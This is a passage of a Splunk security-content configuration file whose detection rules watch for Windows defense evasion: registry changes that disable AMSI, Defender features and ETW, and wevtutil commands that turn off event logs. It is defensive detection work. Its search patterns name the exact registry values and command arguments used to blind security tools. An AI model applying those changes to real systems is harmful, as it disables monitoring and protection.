search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows Script\\Settings\\AmsiEnable" Registry.registry_value_data = "0x00000000") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_amsi_through_registry_filter`

[ESCU - Disable Defender AntiVirus Registry - Rule]
action.escu = 0
action.escu.enabled = 1
description = This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An admin or user may choose to disable the Windows Defender product.
action.escu.creation_date = 2023-04-11
action.escu.modification_date = 2023-04-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable Defender AntiVirus Registry - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["IcedID", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = Modified/added/deleted registry entry $registry_path$ in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable Defender AntiVirus Registry - Rule
action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated.
action.notable.param.rule_title = Disable Defender AntiVirus Registry
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*\\Policies\\Microsoft\\Windows Defender*" Registry.registry_value_name IN ("DisableAntiSpyware","DisableAntiVirus") Registry.registry_value_data = 0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_antivirus_registry_filter`

[ESCU - Disable Defender BlockAtFirstSeen Feature - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the BlockAtFirstSeen feature where it blocks suspicious files the first time seen on the host.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the BlockAtFirstSeen feature where it blocks suspicious files the first time seen on the host.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An admin or user may choose to disable the Windows Defender product.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable Defender BlockAtFirstSeen Feature - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Azorult", "CISA AA23-347A", "IcedID", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = modified/added/deleted registry entry $registry_path$ in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable Defender BlockAtFirstSeen Feature - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azorult", "CISA AA23-347A", "IcedID", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the BlockAtFirstSeen feature where it blocks suspicious files the first time seen on the host.
action.notable.param.rule_title = Disable Defender BlockAtFirstSeen Feature
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*\\Microsoft\\Windows Defender\\SpyNet*" Registry.registry_value_name = DisableBlockAtFirstSeen Registry.registry_value_data = 0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_blockatfirstseen_feature_filter`

[ESCU - Disable Defender Enhanced Notification - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic is intended to detect a suspicious modification of the registry to disable Windows Defender features. This technique attempts to bypass or evade detection from Windows Defender AV, specifically the Enhanced Notification feature where a user or admin would receive alerts.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic is intended to detect a suspicious modification of the registry to disable Windows Defender features. This technique attempts to bypass or evade detection from Windows Defender AV, specifically the Enhanced Notification feature where a user or admin would receive alerts.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = A user may choose to disable Windows Defender AV.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable Defender Enhanced Notification - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Azorult", "CISA AA23-347A", "IcedID", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = modified/added/deleted registry entry $registry_path$ in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable Defender Enhanced Notification - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azorult", "CISA AA23-347A", "IcedID", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic is intended to detect a suspicious modification of the registry to disable Windows Defender features. This technique attempts to bypass or evade detection from Windows Defender AV, specifically the Enhanced Notification feature where a user or admin would receive alerts.
action.notable.param.rule_title = Disable Defender Enhanced Notification
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)` | join process_guid [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*Microsoft\\Windows Defender\\Reporting*" Registry.registry_value_name = DisableEnhancedNotifications Registry.registry_value_data = 0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_antivirus_registry_filter`

[ESCU - Disable Defender MpEngine Registry - Rule]
action.escu = 0
action.escu.enabled = 1
description = This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An admin or user may choose to disable the Windows Defender product.
action.escu.creation_date = 2023-04-11
action.escu.modification_date = 2023-04-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable Defender MpEngine Registry - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["IcedID", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = Modified/added/deleted registry entry $registry_path$ in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable Defender MpEngine Registry - Rule
action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated.
action.notable.param.rule_title = Disable Defender MpEngine Registry
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*\\Policies\\Microsoft\\Windows Defender\\MpEngine*" Registry.registry_value_name = MpEnablePus Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_mpengine_registry_filter`

[ESCU - Disable Defender Spynet Reporting - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic is intended to detect a suspicious modification of the registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from the Windows Defender AV product, specifically the SpyNet reporting for Defender telemetry.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic is intended to detect a suspicious modification of the registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from the Windows Defender AV product, specifically the SpyNet reporting for Defender telemetry.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An admin or user may choose to disable the Windows Defender product.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable Defender Spynet Reporting - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Azorult", "Windows Registry Abuse", "Qakbot", "IcedID", "CISA AA23-347A"]
action.risk = 1
action.risk.param._risk_message = modified/added/deleted registry entry $registry_path$ in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable Defender Spynet Reporting - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azorult", "Windows Registry Abuse", "Qakbot", "IcedID", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic is intended to detect a suspicious modification of the registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from the Windows Defender AV product, specifically the SpyNet reporting for Defender telemetry.
action.notable.param.rule_title = Disable Defender Spynet Reporting
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*\\Microsoft\\Windows Defender\\SpyNet*" Registry.registry_value_name = SpynetReporting Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_spynet_reporting_filter`

[ESCU - Disable Defender Submit Samples Consent Feature - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the feature that submits samples for further analysis.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the feature that submits samples for further analysis.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An admin or user may choose to disable the Windows Defender product.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable Defender Submit Samples Consent Feature - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Azorult", "CISA AA23-347A", "IcedID", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = modified/added/deleted registry entry $registry_path$ in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable Defender Submit Samples Consent Feature - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azorult", "CISA AA23-347A", "IcedID", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the feature that submits samples for further analysis.
action.notable.param.rule_title = Disable Defender Submit Samples Consent Feature
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*\\Microsoft\\Windows Defender\\SpyNet*" Registry.registry_value_name = SubmitSamplesConsent Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_submit_samples_consent_feature_filter`

[ESCU - Disable ETW Through Registry - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search identifies a registry modification that disables the Windows ETW feature to evade detection. This technique has been seen in several ransomware, RAT and even APT campaigns to impair the defenses of the compromised machine and to execute payloads with as little alerting as possible.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search identifies a registry modification that disables the Windows ETW feature to evade detection. This technique has been seen in several ransomware, RAT and even APT campaigns to impair the defenses of the compromised machine and to execute payloads with as little alerting as possible.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = A network operator may disable this feature of Windows, but this is not common.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable ETW Through Registry - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware", "CISA AA23-347A", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = Disable ETW Through Registry on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable ETW Through Registry - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "CISA AA23-347A", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search identifies a registry modification that disables the Windows ETW feature to evade detection. This technique has been seen in several ransomware, RAT and even APT campaigns to impair the defenses of the compromised machine and to execute payloads with as little alerting as possible.
action.notable.param.rule_title = Disable ETW Through Registry
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\.NETFramework\\ETWEnabled" Registry.registry_value_data = "0x00000000") BY _time span=1h Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_etw_through_registry_filter`

[ESCU - Disable Logs Using WevtUtil - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects execution of wevtutil.exe to disable logs. This technique has been seen in several ransomware families, which disable the event logs to evade alerts and detections.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070", "T1070.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects execution of wevtutil.exe to disable logs. This technique has been seen in several ransomware families, which disable the event logs to evade alerts and detections.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = A network operator may disable audit event logs for debugging purposes.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable Logs Using WevtUtil - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware", "CISA AA23-347A", "Rhysida Ransomware"]
action.risk = 1
action.risk.param._risk_message = WevtUtil.exe used to disable Event Logging on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 24}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable Logs Using WevtUtil - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "CISA AA23-347A", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070", "T1070.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects execution of wevtutil.exe to disable logs. This technique has been seen in several ransomware families, which disable the event logs to evade alerts and detections.
action.notable.param.rule_title = Disable Logs Using WevtUtil
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "wevtutil.exe" Processes.process = "*sl*" Processes.process = "*/e:false*" by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_logs_using_wevtutil_filter`

[ESCU - Disable Registry Tool - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search identifies a registry modification that disables regedit or the registry tools of the Windows operating system. Since the registry tool is a Swiss army knife for analyzing the registry, malware such as RATs or trojan spyware disables this application to prevent the removal of their registry entries, such as persistence, fileless components and defense evasion settings.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search identifies a registry modification that disables regedit or the registry tools of the Windows operating system. Since the registry tool is a Swiss army knife for analyzing the registry, malware such as RATs or trojan spyware disables this application to prevent the removal of their registry entries, such as persistence, fileless components and defense evasion settings.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = An admin may disable this application for non-technical users.
action.escu.creation_date = 2023-04-27
action.escu.modification_date = 2023-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Disable Registry Tool - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"]
action.risk = 1
action.risk.param._risk_message = Disabled Registry Tools on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Disable Registry Tool - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"], "cis20": ["CIS 10"], "confidence": 100, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
